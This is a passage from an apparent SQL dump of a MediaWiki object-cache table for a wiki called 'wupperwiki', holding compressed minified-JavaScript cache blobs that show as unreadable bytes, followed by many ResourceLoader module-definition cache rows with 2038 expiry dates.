4!TZl+=M_chd_Bd8=NUY$/_}|k;d֚A3Jbq5;,DB`WRc$3Wk0 <hc%-%~~,s^(n\0F.8 sa:H./*qF20,@`rפh\0~&J\Z?7{KrGXIцo]0=Qʸl&{em[ E2>3Ri}P멀QT~Q-Ԫܳn3~ړQ\0=fU\0 fG{rPjV% \\E|3FZiY甪+4wM͙83I&|\',bHg ,?UɇZi0S0䛅;f88c$<@3>MY/W~eȬW]EZ\0+X􈼝U&cF7 *D2SJ`n^݂gFl0(F9Ӵ:T<]E|=wU,:S6;{!]9GW䮹t\rWr3#Y: KovtX=?e(Q 㹤K[\\9Lu\0ﰇeO}d g imyb1ƃ짿\Zs<XM6njbI[r=sAYj7~}~Rwu\0ʜ JʮFRnG(9 $\\FʶB{ŀ@aP!8\n(\'\'dի.u:p-soǒ\\?M?*̙-jO*r)NDގR@dҨ/Ӎ!)`hҥx+#Y\ZEgVEMǓt<=8|EJYJ(EvYr;wxۻ2,{|ߖ ^^\\/܃q/vY\'','2038-01-19 03:14:07'),('wupperwiki:resourceloader:filter:minify-js:7:f81c400965e08b3d5271a72928c91be7','}{۶k1Hqd$=ɞ&uGIĘ\"Uw\0P,qS`0 \0({s/ͣQ\\xlƳ8O.N x?M4E6<OPҮӜ7Z\n\nY~μ??PaHS\0iR\rT9vK\naX?c P47K(LKQ|aw\\-#ĕ\\.a㍓ [kjW\"FI\rxo^s\"6#˽uK\"D |(0-Kl K\"F` ,a j\rb8,ȯ2l0+iRـ} M!)ʎ\\㼰1+ {n\Z\nD^\Zgj\Z$?Art$ETT8IN%P ϢY2U66GRX A\\8\\5B 8:#! N:J|E\\!\0,?oÜzKs\Z@}!~Q;B+mhͪL)\0*c(.eW2Wt B͝糢.C]B2\"!Ԡ/QV8u9J2G.Y\\()K1Xeon,Swn92ʝ%Q\ZJ|\rSP(?@Β1ȣ6w\\}X:rw/!TY\r!}wD\'}ɠ@ҧ\re*~)B\0྄**pYVZTS!mߩs ]AG\Z~Y#!az>Mґca9;3zwxaxtZxmƲ<U(f+4vuв5;@i4/05kg҈$U`Xq#p@N\'iA9|Z\nf()(QY 5\nft$IMULLX\ZQ6iD24IZZ24nL`5OA 켫ۅsE/|\'#w=\ZêlS唹n%eз¸;<4*OJ۪\"* ֓(xK\r1E0n\0j.U]R~\ZKԉ\"s4i Mуtɟ$+(^%#*#\\=i4\n,~XDlaؿYN,A p:&:\rQgCkH-j-9Oqz}w0_KՉkr[%iv`V ˤڊֽT׎kW:<m}8pa0@Or`egFkV e}@V.vh4jYa#{\re^[BUUUa[WG7`<+\'z>o$uZf[B4ZHB\" 7st\ZgP\r[PFj+omDK$XY\"ZEUAk{1Lx;X>w\",:L\n[&@ D#Н\0s \rcӺ4yݑms-msdaۘ2 1lJ\';^\Z:#&P U Hj\rzL.;Yudb;,Nf΃vkI#MF2yS6MbV~\r^cYnozHzTپU$fOelZ~c#bJƳ\n+\"d̾m&E߅b\"VVBí*|\0?pST#G6GݾZsA74aCKOG\r=.4;L\0n2VVk;u.HVA7M0H6f]o)C<>gvu|Oկq\r=J>o`@\'#A\\-c{1{(Mm]\'qeXjEeOqYhlxD$g or?o8ͣ/p+2򿺋2.epS{Β%cV\'6V^0r72\\e^<*VrV n\ZavP4).3m8%A; ؋s`B/a>:$KƗ]q=޽ޣǣQSꘖ辿 %Sb5`x50vZϻyv05#]*EfCu颰н6Qk\"\\] T2_YJI*iL(XŠUnA^9Y<(|{Qhi($l\n7IIK[DI@ʉWy~\0 si \nqhLg\n:JEIgŤ bBcƶsiM5&VQ PBY%ֆzdTb$G_DVG!jqkZwoBhSKUU.5X7(\Zf9䑩33I,Q5ɥn”qAU/6ep::{c_7v~ ,-\\:-}Wx݃9y1zC L (֠Ff$N=-7WxxjS%Ze[]qd?giq#.6`8V8~.Ta7j-BVs@hx 4`i)0t&1h\\jH9uZ&Dxݑȝ`;(bE0QcY!}g͘&\0:C21ha\\\\k4$=(`jυqZ \r6)tvhJ`VYޝ$g*Ib͕9M*.kS9~>rq-/ǁ ;KI‰J<\rS\nRkNSlSU$M3\n}yװePm0\nmLc9;rO\"\nXT\"b\0eFQv(j$8rdPpc9hBu9LsdMF%#VO5+[. P TqԩGղÖR2vQֶ~=%\'{ћӰ\"cF\nŲ]|mʌ+A\r,@i?[thƁ>Jbd$zK\0٬\Zڑ H iP-\"FIN\ZUC .dˋZal^XS#-Aj,5cXcn^./CHzso@x ⢺)M.Q6ښ%/$rvϙT0_cF4$)\"gnᬥIg`<, |tqmPݫ7gEQmZD\"XPm-\"wq`EhD2.1#?\\c΄$xP\Z 6 LZ\rꖑ7xω\niCp4U9< Z lՇJuY$e?a5x67u#C,W@K >뫸S[Pm8F! ϡ\rkmȖaܩN[l4sC\0VpoWuي=+S0\ZEglK6j+z\n9k ]߶w()C٣k12#EߪEM YD. B(ֻ}b\0#\\qOu /X1s^`k@J0j?g[\'2hX>}Hk? \0⽄| Nd]b Dž6@+֘3ͩ생5jaWr`ԼA\'x1M0.^ѮH |&s찍ȱ u)3-B[JY-c;ERœ‚k;loN*ee_1hV\n)T\nUFv\' Z**/ ^vBf:\"@GN9=_\"-g p,N@\r.45YhRB. ۺ=s Tj=۲I`Q-wu&#\r񝻁PDzc*hG߻]\'l!Jб=Q^hفҨF2dUjaQ <(@[Pi_ SԺ@j6 ~BO3A%ƕoBiyDs⯎Jdg-%_&풲v]Zɀ6rk]ܔVgҦl?ݾvsBs .ir]=IN=Q#|8EC)B0ŦH?֕YEI61XŮxGRMEh3+T΅dR(@geD,N¢e:5G\'CZ @MXbg\rȓmK7=\n[[ VxӽCo-+-\"\ZClHΑoKWhud=X;eX,vo(˻ \Zꋕj\nLe\r\ZPmII4x{5,6/t\'B۝!y7^[|ƀLWFkQWҔu=}\nø>37\\P~w o!)sk\"8{ͪD\\v{Y!ѴSK3mPצSrhvBc37}\nnm2Ѡ=M:zõ{f]_HnU\'M=CTޠrdJX[۴Q>nJ}qKb?޿ȈMCq\Zպ KwD ~/?%\Z+߀irn \".:_ON]NC?P%Na.Ĺ$y/TÓ>,1wSԇ͐N5]!7l\\|ߧzdz]|2\r ,o\ZsJDO i[_z-p&YcX?UhQTDGY>,.B%wl=\\x20`]jkjw<6Ul=stg&k}AÎZ,A^(ԒAB }n17bUUy5njBm0͟ Fl(<\0~\r\"Ul6ιt~v07C6ąoq#&\nuvz%ͅU[mLsq|B\n]l$QڶrG/7#H. D+< 0Yow`C|Ua#wAKŎ\ZQ򎨰1.&-a-7cӅJJmi֗xmsi!kî^Pf\nTK6޾N@1Ns\Z0@Jrw-^ctz /6VK44؆\02Ad~?𿫶QT`_cTxLN\nk0K\nd:~?ȏ.{w~kW<qF}JZYoNl[5KF=Ho*D$nJ_7|4ᅮJ4It6S# !]6cI?{~ƲViF8|eUzc]⺂<b\"W[V&)oFMN:]jYRSYy:ʫƏFG(߻w|o0x4F;W/n9@wg`m0%]{GE6H\\÷\r\'ʷmkF (RYTIaE6 LqvWwEd;oR0}baMTtϵ,t~^Nf\0~AJ+{c\'@g|O>{yhnG < 9Y\\IaQ*75Ӂ\"٧CS\rPzA\'oCr|rGLl!X?coP,t{/0Ծ5L̇SLdƭ>v>\0F |\"V_ `zwGZڰhl 2F;+\'{w [;$%)0\";XV\\<.;xP<˽TCUtMA\r%_x ,BB\nYҟ&klU(zt{?fC/X3 3G W-zȆno; 7 .:_:/q(rs[.g+^rs@3 a@t~S;5Z/zN]&:.d\Zfކ2 ǬYᅮxGBbK-a(L9L׃/o Z\ZFF\r(I0\n7t&\'}1P UEØo\\51zmkZUs]B!,CU ?_ޙWJ~wfcӚuK7ć@ABz[w!mg\ZX>u,g-j 4C=٣}k-3XzdPbG]g@%/cЁVtG_fSD6n٢ه\"S}xu D;,$`t~}Z\r|lZ}@]PO\Zp l&qW4g{!ʦ1\rU^x0Ojn*ݘjBp44XE. 9\\u\Z`ºHQ8PK* C!HǴ̢Id~@NR\\Hٳ|e5Q)_4Dy)H o\Z 3`ћc\0YI|~FW q; 6R1A< ȹAeҥI8oA4uI/]I\"#A8,PbR&\0L@yP(MUJERVeF ]0׫yX%U}Y)>JAsB#šdP/P|={vr4I`,h.&wt9g\".f\r{mPe)]E-K`\0y\\Dɉ$ރS,\'Hy9#ܫEg\"!#Y$)oZx 8{\nmW(E%\"4Շi-}w\"#dl:Qz1\'B*%C~Y\0.7.n٥-E:*ޒ\'ލ:wUT1˸s|g,!/OUEN\rx*,PISr.).nB[ xĒlK UQ 3c,1Y\\![=ɀKּ߲.O$ d=ijI+H [yBlS\0Nj:oN\"OM.EGP Xڈ-u[N׸CTлzBOѝ)n^klm=nv{y8D`&:L$k(R\"uw[\'5&kk]+{7;(|[d߿v\njR + WӢ)g9W8Njw wvx+cӝG0/hq$6زKv,]K4zע:6kn qt~4\r >>{cB&eM?.z^Zu>.>w\0_\0\ZZs19b`%.7o5wQ\r?M@0+Pqn\'Elٛ&k?St?o#)ʠfϊ31YM\"<} g\"Jxm2<,2!PA#WYJ@s{Z2mjjp}Ϥ_alK\n2dmBr?2qǝ0QFˆQ>{1\05͔-&_ \r#|Ƣ׿{|??/{_LOg,e|~qr|/l)zEd;JPBJNYe5KME&0E\nP IR~7ù v\" [1ģ2Ģh3˃F\"n˫B\\OK\nUnMIDTa%4 X(K#%==VZekkvէף$09ߺcicLBÓ62tueE7zh]\0řb gwRNV0lIy8,Sdӎ{jN1I\ZU ʅUx.^E?|xLTo#5ʖbKl^gh3 ]M: ЪbuAYu\"ta؞GYҏypJ` 3T`!1U]/Po wQVbIf_n>zmpEWǨg\ZBKqoc%\\ƂP{xX=jm1+9xk rd\Zy!\'^i@}-P~4 OQ\0zg0P_--(#RF4hbF]Ѝ\"frjoI=*.~A!zkg\"z/QIƝb\ZHu>;HWLod9?oaPĝB9 9-:S<\\:Σ (rjYcLˈJ\"c6t7\\k`/W}bdMU\\y-p(]ȏX+p(~eA)w@\Z.\0)n:Eq\nik!\'8D#.nI@&K|_բٴfZ6!;*k*H\'.iOz\"T̝u/JA\"T\n{{)`cp{r\nFr5q=#ljq?aStXsGZ,\0u/mҙeïx=0Ks]VD lo1\'r>\'d%\'K \'W<2N\'k9Q;&\"!>Njz\\DDD 5{%_c_7=1\nN>r\0:ͬ}mJHbX*|FC\\t@_7~eq8uZd_;1 u\rqڿ&_1A\r\'&7(TZtA{PDd9&R1q̒5j i\n)P A;\044b \n Iq\n\"[ <ϑ>P:j1N-FX*ֵT(e2@{:&:0P oH\0]*ڲu ވ\0)[\"?\',; M8`vC98(r0+S@IU1FΌ lZ koM=ŜT JW\'> 3Ǥ4NÑ/VV a\n7 z7_8 {ce(Ǒ9K3\r( \Z? (ٶvTp,Dg(5%~}slw1<|FpY閈-₸G~MYhoL\0/nr^ 얾\"^LZZu+ٖ֨buלFF/J|B\0J?>2{s8$[hbO9uZT8\r\'̭ZOt}|o 9Ĭ9E䕙km7oegC)v7$s2Ud;QFBx \nn=$ . <\ZZlք\n5\n\n9ly8MeŚ#C5;,o Ch,![4(̛p@\nPHgLYSIaN(64RIQi?ZrnRs\ZQL疝\ZqtČ0I|Yg99\\_2z\Z$86. ?EǧZP\Z;\nh\Zr(*lr k;&}pHl#2H[5F1V(I@9>  =蹀hJTDvς\'DLqVprx$EI0=V9H=N ]8KRau?]&h?W{\\0dy_kQ9qa\\wXI!\\yTaGc)oe&,(\'yTIkF)2CHVD\\@*į1ʌT4i9eU[ 3tdE8dOPKv ʚɖK\\Km|%q7<.\" x0GJٕ\rD<aH))DYUl\\O]X$q#},M |%`PM.c[=F-\'Zq-C%xmSv5Uj`+^.-2*+;Z VL-u rdv=.֙WpJ:i^Kly:4Zf[TG#,QZȳDF-)w?SnFqVԔxMWUR%Z+\r \\*ʼ=nhKo76xqri^-Q6M#ȻvS#.b!dj-2v}5M\Z#hC9&?n;\ZYk #:Ƙbq[yg3GHeX`0zd2誾}A3AH[)ƮaZ\Z:+0rCTFYUaiY\Zy/>s}OGI FHGPpF0lW7QciQZڻPs\"V`ց%f5sRGL&F#\'MĖF-|&Cf`N*m#oajݭ2]9$umZe 7p֍btuȃKoUiqcO.6k[- !jvg޻MOm=87fVԊ0|^Q nrz?2bR-,cJ˺bۀ\"1wAT,ϲ2+V=BTDq\"@OvF@>g׳LaG{e%mNw,.\0\'_8:٥>ƽN70Rjc.i)jBPMG#7@SB8\ZHzkD74͈\ZƘ\"_3*Ϛ]GǫzF,1u1=}ҥ0SmhsʚPܑ.Io*opm, \\U!ۧ ^l\rps;NC^]R[\rǬ.\nY9C.̿6Hy\nˢ؜[慲F|-޴v&-rfCk&.bE<<7WJ}ٓ \'8}[qNS\'.Qڎ1ڰefG@$\"@rm)b_YeTRDhu4^aVWB/K\Z\0aQКB&3*B1\nC kYE:ֈ!=\' TO?|FeA@O*JV\rq^Sx͋. PM#:9e?S8TZuyo%=Q$P(A{}P C+B\0:ܤɟdt4jN`ԀޔppZڅ\"U79Z,Y-U6Z-u)Yx\Z?','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:es5-shim:c27f7db184217c78ea23a6536bde6450','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:ext.wikiEditor.dialogs:64020bbbb2b993ca0b8dacd74dbb349a','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:ext.wikiEditor.preview:fb03a2721fcea178dd536c9c100d3be3','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:ext.wikiEditor.previewDialog:14029d9a95d3e620eefa39285a26f5d1','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:ext.wikiEditor.publish:5af95888affe137a4302264025042087','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:ext.wikiEditor.tests.toolbar:9fa2426cd4d8e2fe6f6cbd37bdbfeb25','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:ext.wikiEditor.toolbar.hideSig:045aa5051a4da1040330d2f984378202','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:ext.wikiEditor.toolbar.styles:f95b78d38d8ec19a3212a9e446f22c94','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:ext.wikiEditor.toolbar:e1475d48783d4d4befc6c300ef3edfd8','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:ext.wikiEditor:99bbe8921a5821b14d44806d09830ac2','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:filepage:1d520fafeb829f8a4d2f6a33e810b834','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.accessKeyLabel:f077145f018885ff4e1174624dda50b6','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.appear:4e2f3a726244a69a14102efd3ae536dd','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.arrowSteps:405ce408685c57bd5b997ef9c57ea35f','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.async:9d9b48452885f1aaeacac6162282378f','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.autoEllipsis:bb5efeef852a0add4acae97c84a4e1c6','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.badge:6b8925375e46846b84db54392d816309','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.byteLength:9e8600701388f5ad8077771593b09de7','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.byteLimit:2d4eb11a2e46ca4374b062586be0e9eb','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.checkboxShiftClick:9f23e56c70f6bd322f9b0ac82d01a113','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.chosen:ff94a7a4a16e6d0f2e9b740dd3f9d34a','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.client:fa03a3a8936b2cb9d9469066c95558d4','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.color:bb8776c5a2791aa67d17b06a1f4ca2ec','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.colorUtil:6252f1c1d83920827e4ee0de2c178030','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.confirmable:452350ab0221bb9f0348ba1e0308114a','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.cookie:6be6e4ef5ab6f8c956b4bf43190f5bb5','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.effects.blind:ffa7a0854904735e06a7acdb9516c098','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.effects.bounce:8917d81efac1ac66e7069d8603b5867a','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.effects.clip:2da2c6a91a606e1350ea504b070a62f0','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.effects.core:cc8d080e65814717c0cf32a775ca5198','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.effects.drop:4e405179c9473330184e7427042a0bc9','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.effects.explode:4ea2fb31b50c0dd73413dacb48b58d5f','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.effects.fade:4ada039accc03baef4ed4bff9141134a','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.effects.fold:69f616d59c87ef3db90c5b9c1a53bfb7','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.effects.highlight:650778593ee120aed4b2daf326b2ae22','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.effects.pulsate:4e622433e54c264a3e8f9fb32ad436f8','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.effects.scale:5a5ad5715dc4523931c641060cbdb6ea','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.effects.shake:c3c90f478ed9ad928489d1074c77795e','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.effects.slide:310f124d99603c500d96609779ea294a','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.effects.transfer:46c47b284e42dbc22fb5a7e16061be44','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.expandableField:9a7e284adca4851dbbc327e719985dbd','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.farbtastic:bb8f774fa72398d4f3183322d6818940','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.footHovzer:6e63925aee4ad7fb87ecf22f25f6e69d','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.form:8eb1bc486879709b9c8e326a2eb48cdb','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.fullscreen:c90ee0f1fa8d83b8f679542d08654a83','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.getAttrs:085325fb9d8136b95e346d7a8b4d892d','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.hidpi:fdffad8d4c8b2e12229f0a57438d3091','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.highlightText:61a85d599ba2a6658fb21e1a6353eb46','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.hoverIntent:2ada56fd7913d41da5b0e8e00c329ec2','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.jStorage:2d357fdd9c14f336eb18fcd8b8495993','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.json:de3361e2501a0bf22060163863810297','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.localize:6fa1f5cadd139a50757027ac79821afd','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.makeCollapsible:c33f9a49f8366236c55de7e21550f8dd','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.mockjax:88b7cf2fdabeee0274ab5f7a42f312dc','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.mw-jump:eeaf1484797bc3c698261b81042ee919','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.mwExtension:845820947762682d32b968ad7b41ef9d','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.placeholder:e6ba5f79b882bb883b8520cc244d12a3','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.qunit.completenessTest:b0ad42a6f9284a7fc9902d290bc16d37','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.qunit:5bf79624f7cb37c50a91d6ccd63ad6cd','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.spinner:2fdfa7bc0080afa11697342c89125901','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.suggestions:ac7899c6a08ff159c84b48cb177b41b5','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.tabIndex:f9ff41ee065f115e53e3cc0625de7578','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.tablesorter:93059adef08657899945b35cc566bfd2','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.textSelection:1a659d80e1d46023f856de0b0a4d2828','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.throttle-debounce:6d0c93fb9951b7a0403d8a34b2931767','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.tipsy:3d2af19da993e247f3e04090718e3429','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.ui.accordion:1c33e44b5ce918f4946d579e148c8f8f','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.ui.autocomplete:6ce8a1b1944e8e9b72792744d846d7bb','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.ui.button:c05fd3ac315e0ff9f09d98311a1843e8','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.ui.core:04f7034f7ae5bc7811f23e3c0dd5fd88','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.ui.datepicker:68cc98bfca2e7313caa4cdb84ba5cfa0','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.ui.dialog:8df829eb32bb9effa30d49fa8569f62f','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.ui.draggable:4dc0cafdbf0e5052b492654e0578f2ed','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.ui.droppable:6851ccf136421f288efb6d260513db27','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.ui.menu:b2ec22b4396343293483139f49808b10','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.ui.mouse:7b7f2df8256ef8b1f7805592149d5071','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.ui.position:7a97d51abee07b72d8410991085fcd3d','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.ui.progressbar:b2b03beb1628ecf2c512f5c1b73b6de1','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.ui.resizable:dac800951ee0aacbdf60154d26e32c07','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.ui.selectable:5b2834b2709a454ecba22f755f13ff76','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.ui.slider:8e4ebdf2d5e6e8baff77d2cba087fef7','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.ui.sortable:0bd49ac3b982226de95f55f7ea58442e','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.ui.spinner:c1453b8a0e637764b7ccb6cd41029943','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.ui.tabs:1add70491f43633a5e43f2b540ed6889','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.ui.tooltip:6f4de9c09daf1a9beb74e7f812f95963','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.ui.widget:11bed0b520e26c0b77f6b1f6ceee227f','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.validate:50976411d64ba2b6eeb2f8dbdc9861a9','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.wikiEditor.dialogs.config:1555b863500291711b7e1cc6f1dc4c0e','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.wikiEditor.dialogs:cbbd782532b95c963d35f1e52e11ac7c','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.wikiEditor.preview:0c4049fdcb0026f01f30cd3999391d23','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.wikiEditor.previewDialog:fb2716a9c0cb23386ae0dc664612cc94','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.wikiEditor.publish:1c2245ac319854c18ca8e3ad26531e47','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.wikiEditor.toolbar.config:9468f83d29492799734fbc3a436f4ff4','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.wikiEditor.toolbar:17fe4150c6ad5b2662aa6a172802c835','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.wikiEditor:e1c960be7d0632da9b2a753dc67db43f','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery.xmldom:6248d774311e7efbebb063ea5fdc5d43','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:jquery:d98b153344e4819c49e055e4d3b489f3','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:json:85b758e49befd3609ee9c1c6af4ddd7d','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.Title:18008dfeab2d51b58443c54baedc1961','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.Uri:27fc4fd7697b09484a4f966c6553102b','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.action.edit.collapsibleFooter:2955356d8f0bc6580d56123fc3c6a259','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.action.edit.editWarning:7f1ecd91bf5785227597f75b112b98f0','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.action.edit.preview:70d217c30a7d45acc46c2f2bd6346f99','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.action.edit.styles:929cc4e285a24957834c4a39d8cf3f72','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.action.edit.toolbar:db66398496c885eaacb2ea61ddeb9347','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.action.edit:ef76d655edad51f2a7e2e1598d3cf41f','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.action.history.diff:8db95bc0662e97c5928ade03c5dd0eed','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.action.history:d80e698ba9d7ea04098e066af28b0269','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.action.view.dblClickEdit:1b60a8a6e9b450da87b6b97410e40256','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.action.view.metadata:0b798de901921bc562551f7828efd503','˴2416025270\0','2038-01-19 